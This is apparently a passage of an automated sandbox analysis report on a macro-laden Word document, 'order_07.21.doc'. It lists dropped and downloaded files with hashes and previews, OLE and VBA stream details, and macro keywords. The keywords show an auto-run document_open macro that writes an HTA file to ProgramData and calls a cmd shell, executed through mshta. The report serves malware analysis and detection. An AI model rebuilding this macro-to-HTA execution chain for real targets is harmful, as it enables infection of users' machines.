                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-22T09:07:25">.. Build: 16.0.14320.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D95204DC.png
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:PNG image data, 1022 x 235, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):25449
                                                                                                                                                Entropy (8bit):7.717073073385733
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:5Q0NLh5g3xayQTvC4JwSJHfVEhWlB6zLn:5Qig3xayQ7JwoHfVEhWlB6H
                                                                                                                                                MD5:8F21C647D253A3CE991C371D19437151
                                                                                                                                                SHA1:6FCD455E7A040B387AA6F5A6737FFE06C5B9E39A
                                                                                                                                                SHA-256:7E7864C1563D7D1EDFE3FBDD2F9524F30EFC716716E84F25A1691DF7F628206F
                                                                                                                                                SHA-512:260AD36890A8947D351AA2FE73B76CCD7361950D3F564191E04FD540C62A89C55E65FB8C31024C18D21BD7B018CE44FB12CFD0B0268CF41DA56588B70FA1F7C4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: .PNG........IHDR............._../...&iCCPAdobe RGB (1998)..(.c``2ptqre.``..+).rwR...R`?..............> v^~^*...v...D_....@..J.(*.....(%.8......../)..3...E..... vQH.3.}...K.....I........ ..H}:....6....KR+@.28..T.e.g.(.ZZZ*8..'.*.W.....+x.%.....%.....B..........j..d.2.....9....bg.b..\ZT.e22...#.#.......B...a.....T...!...>..9...O..:6\....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164648, 2021/01/12-15:52:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{291D132A-985E-457B-93BD-A7421A788068}.tmp
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9588
                                                                                                                                                Entropy (8bit):3.3618372712894495
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:0JtOd6IW2Ju7gkWlqCqvcDFoIIHMSWjWHUHf:Wti6MJu7gkWovQKMSs
                                                                                                                                                MD5:A288C2A6BAC372AE31C358B496F7C549
                                                                                                                                                SHA1:B08EDFD6B72785A3A42A8E1E9E40724309CCB752
                                                                                                                                                SHA-256:E22C497CD1117A4F7BCAEFC70D0BB8BDFC18F6A3C18FA526CD687165D787809B
                                                                                                                                                SHA-512:114831BBD0E364DB706A97285C744B6FCBD03ECAF8379058DCB7068E16ED5AEE7973F9722919E9F97620A8ABB433924CB40AAED34199035C90C041EF41099B2B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ....<.h.t.m.l.>...<.b.o.d.y.>...<.d.i.v. .i.d.=.'.i.n.t.e.g.e.r.S.w.a.p.'.>................................................................................................................................................................................................................................................................................................................................................................................................................................................................. .......b...............*.......d...h...................H...L...z...~...l...........4...z...........4...:...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3A08EB8E-6584-4B4E-B17F-83D5E76135F3}.tmp
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1024
                                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\warning[1]
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):1062
                                                                                                                                                Entropy (8bit):4.517838839626174
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                Malicious:false
                                                                                                                                                IE Cache URL:res://ieframe.dll/warning.gif
                                                                                                                                                Preview: GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\error[1]
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):1706
                                                                                                                                                Entropy (8bit):5.274543201400288
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                Malicious:false
                                                                                                                                                IE Cache URL:res://ieframe.dll/error.js
                                                                                                                                                Preview: ...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\error[1]
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):3247
                                                                                                                                                Entropy (8bit):5.459946526910292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                Malicious:false
                                                                                                                                                IE Cache URL:res://ieframe.dll/error.dlg
                                                                                                                                                Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):83
                                                                                                                                                Entropy (8bit):4.095861311293715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:M1MtaU1dLpzCSmuaU1dLpzCmX1MtaU1dLpzCv:MyZ1nzCq1nzKZ1nzs
                                                                                                                                                MD5:F0C35EEEFAFA7881E6F77FE8CFFF3ED1
                                                                                                                                                SHA1:0CF6D4009377E26E352F7A117274A6047E5E57C3
                                                                                                                                                SHA-256:80285E07706348E9697D773D2094D5F99991DBE9DBFD963BC48FCC47786146B9
                                                                                                                                                SHA-512:93B8C36E2400DEFA29324CAA31F5ED61CB22789823BF225B5233A1843F6203927A67B295671311F7204E57D87471232CC8F88D73F7DF21BC5CFD9A11599629D3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: [doc]..order_07.21.doc.LNK=0..order_07.21.doc.LNK=0..[doc]..order_07.21.doc.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order_07.21.doc.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:40 2020, mtime=Thu Jul 22 17:07:25 2021, atime=Thu Jul 22 17:07:22 2021, length=89257, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2120
                                                                                                                                                Entropy (8bit):4.71528273257959
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:8fxl1tUAJuNDKsf7aB6myfxl1tUAJuNDKsf7aB6m:8fxNJu/eB6pfxNJu/eB6
                                                                                                                                                MD5:CDB519CB2C494CA45B65093C0D743A19
                                                                                                                                                SHA1:209DEE9C097D09B2D85890A3E7A2F8EFFBFDE998
                                                                                                                                                SHA-256:367DCAB0E5C2B9B5393817D8D0C986257EE554DFB3404E66CAA573BCCDAB7691
                                                                                                                                                SHA-512:B86E1A3C8F9FD40AF6557278F7A78F43B6BB5470C0919B40456D45F965993C244559589AD35DAA7EBCC7645A7EE002076DDDC6BE8C4ECB27B5E5A94BDC1006D2
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: L..................F.... ......:....y.l$...3-.j$....\...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny..R......S........................h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny..R......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2..\...R. .ORDER_~1.DOC..P......>Qux.R.....h......................(-.o.r.d.e.r._.0.7...2.1...d.o.c.......U...............-.......T...........>.S......C:\Users\user\Desktop\order_07.21.doc..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r._.0.7...2.1...d.o.c.........:..,.LB.)...As...`.......X.......887849...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):1.9997788054802266
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Rl/Zd8dC7CdfV/ttlcdsL/t:RtZi3fdysLl
                                                                                                                                                MD5:DA9F1E2BDB1EFF4B9FAADE78AEF6B744
                                                                                                                                                SHA1:6D6630119F366E32BD5D354E437A396B40E4ACDC
                                                                                                                                                SHA-256:4CF812A8D09F6722E7FE5368DF3843C8A75A70CDAA67FCBD398E0C0A29533BD2
                                                                                                                                                SHA-512:967EB9EAD6ACEC99B452FBED2D474F27159014F1AF7A520D47C353C366B5759366DCE66929F6C89D3391CD7E1586732265860617B5A7EB0B853DCB01079F0E6F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .pratesh................................................p.r.a.t.e.s.h.........Hx.k."..........................Lx.k.#..........................@x.k.$..........H...
                                                                                                                                                C:\Users\user\Desktop\~$der_07.21.doc
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):1.9997788054802266
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Rl/Zd8dC7CdfV/ttlcdsL/t:RtZi3fdysLl
                                                                                                                                                MD5:DA9F1E2BDB1EFF4B9FAADE78AEF6B744
                                                                                                                                                SHA1:6D6630119F366E32BD5D354E437A396B40E4ACDC
                                                                                                                                                SHA-256:4CF812A8D09F6722E7FE5368DF3843C8A75A70CDAA67FCBD398E0C0A29533BD2
                                                                                                                                                SHA-512:967EB9EAD6ACEC99B452FBED2D474F27159014F1AF7A520D47C353C366B5759366DCE66929F6C89D3391CD7E1586732265860617B5A7EB0B853DCB01079F0E6F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .pratesh................................................p.r.a.t.e.s.h.........Hx.k."..........................Lx.k.#..........................@x.k.$..........H...

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Entropy (8bit):5.976846319095004
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Office XML Flat File Format Word Document (ASCII) (139530/1) 62.14%
                                                                                                                                                • Microsoft Office XML Flat File Format (ASCII) (66519/1) 29.62%
                                                                                                                                                • Visual Basic Script (13500/0) 6.01%
                                                                                                                                                • Generic XML (ASCII) (5005/1) 2.23%
                                                                                                                                                File name:order_07.21.doc
                                                                                                                                                File size:89257
                                                                                                                                                MD5:401b19c454075d52bd832725f3c22cfe
                                                                                                                                                SHA1:088f76c184a0cba673abc41bd5582e4e21672fdd
                                                                                                                                                SHA256:6b94e6319e46f52058d5f0c1bc07d7e367152e3bb769f2fd1af097914fe64ce3
                                                                                                                                                SHA512:b83ddf0a5dc6174591e0c07a1b87f5ffb5a1efa731913707829195415bed70a5dff43d9669e948e509fd3e77d15986391e1e01b9344c2694dd1b0fba5b87f894
                                                                                                                                                SSDEEP:1536:EVzJCsRRHr11AQYyqGJHQYCDEtU6dLTR97YVuL6:NKPxQYNtU6ZvYVuu
                                                                                                                                                File Content Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<?mso-application progid="Word.Document"?>..<w:wordDocument xmlns:aml="http://schemas.microsoft.com/aml/2001/core" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmln

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:Word2003_XML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/452438/sample/order_07.21.doc"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: ThisDocument.cls, Stream Size: 1309
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/ThisDocument
                                                                                                                                                VBA File Name:ThisDocument.cls
                                                                                                                                                Stream Size:1309
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . % . r u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . z . . . N . . M . . . . . . . . . . . j . . . N . S " i . j . h . . . . . . . . . . . . . . . . . . . . ; . . % . . . C . . . . . t . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ; . . % . . . C . . . . . t . 2 z . . . N . . M . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 06 00 01 00 00 8c 03 00 00 e4 00 00 00 ea 01 00 00 ba 03 00 00 c8 03 00 00 58 04 00 00 01 00 00 00 01 00 00 00 25 82 72 75 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 7a b8 8a b8 4e cb 83 4d ae 0a a9 05 c5 c8 fc 85 fc 04 93 6a d4 ee dc 4e 9f 53 22 69 1f 6a fb 68 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_Name
                                                                                                                                                document_open()
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                "ThisDocument"
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: boxPasteNext.bas, Stream Size: 1668
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/boxPasteNext
                                                                                                                                                VBA File Name:boxPasteNext.bas
                                                                                                                                                Stream Size:1668
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 82 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 03 00 00 59 05 00 00 00 00 00 00 01 00 00 00 25 82 8f aa 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                VB_Name
                                                                                                                                                main()
                                                                                                                                                captionDeleteCur()
                                                                                                                                                Print
                                                                                                                                                Public
                                                                                                                                                "boxPasteNext"
                                                                                                                                                Function
                                                                                                                                                windowLst
                                                                                                                                                Mid(ActiveDocument.Range.Text,
                                                                                                                                                Output
                                                                                                                                                arrayObjectButt
                                                                                                                                                screenIndVal
                                                                                                                                                screenIndVal()
                                                                                                                                                Attribute
                                                                                                                                                "c:\programdata\captionEx.hta"
                                                                                                                                                Close
                                                                                                                                                captionDeleteCur
                                                                                                                                                windowLst()
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: buttSwap.bas, Stream Size: 945
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/buttSwap
                                                                                                                                                VBA File Name:buttSwap.bas
                                                                                                                                                Stream Size:945
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . % . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 25 82 5a bb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Function
                                                                                                                                                Shell("cmd
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "buttSwap"
                                                                                                                                                windowLst)
                                                                                                                                                arrayObjectButt
                                                                                                                                                arrayObjectButt()
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 459
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:459
                                                                                                                                                Entropy:5.38200596711
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 E 6 C 1 6 6 D - 1 C 7 B - 4 2 6 B - 9 C C C - 3 0 C 0 6 8 5 F 4 1 D F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = b o x P a s t e N e x t . . M o d u l e = b u t t S w a p . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 F 9 D 6 5 9 C 7 B A C 8 2 B 0 8 2 B 0 8 2 B 0 8 2 B 0 " . . D P B = " A A A 8 5 0 A 9 5 A A A 5 A A A 5 A " . . G C = " B 5 B 7 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 45 36 43 31 36 36 44 2d 31 43 37 42 2d 34 32 36 42 2d 39 43 43 43 2d 33 30 43 30 36 38 35 46 34 31 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 62 6f 78 50 61 73 74 65 4e 65 78 74 0d 0a 4d 6f 64 75 6c 65 3d 62 75 74 74 53 77 61 70 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 107
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:107
                                                                                                                                                Entropy:3.43250959943
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . b o x P a s t e N e x t . b . o . x . P . a . s . t . e . N . e . x . t . . . b u t t S w a p . b . u . t . t . S . w . a . p . . . . .
                                                                                                                                                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 62 6f 78 50 61 73 74 65 4e 65 78 74 00 62 00 6f 00 78 00 50 00 61 00 73 00 74 00 65 00 4e 00 65 00 78 00 74 00 00 00 62 75 74 74 53 77 61 70 00 62 00 75 00 74 00 74 00 53 00 77 00 61 00 70 00 00 00 00 00
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2785
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2785
                                                                                                                                                Entropy:4.16324625344
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
